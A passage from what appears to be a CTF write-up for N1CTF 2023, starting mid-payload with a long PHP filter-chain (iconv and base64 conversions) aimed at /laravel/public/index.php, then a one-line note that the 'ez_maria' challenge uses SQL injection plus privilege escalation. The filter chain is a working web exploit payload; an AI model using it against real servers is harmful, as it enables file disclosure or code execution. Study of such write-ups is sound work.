base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/laravel/public/index.php"
  }
}
```

ez_maria

SQL injection plus privilege escalation.
Please refer to
https://github.com/Nu1LCTF/n1ctf-2023/tree/main

About this Post

This post is written by Boogipop, licensed under CC BY-NC 4.0.

#WriteUp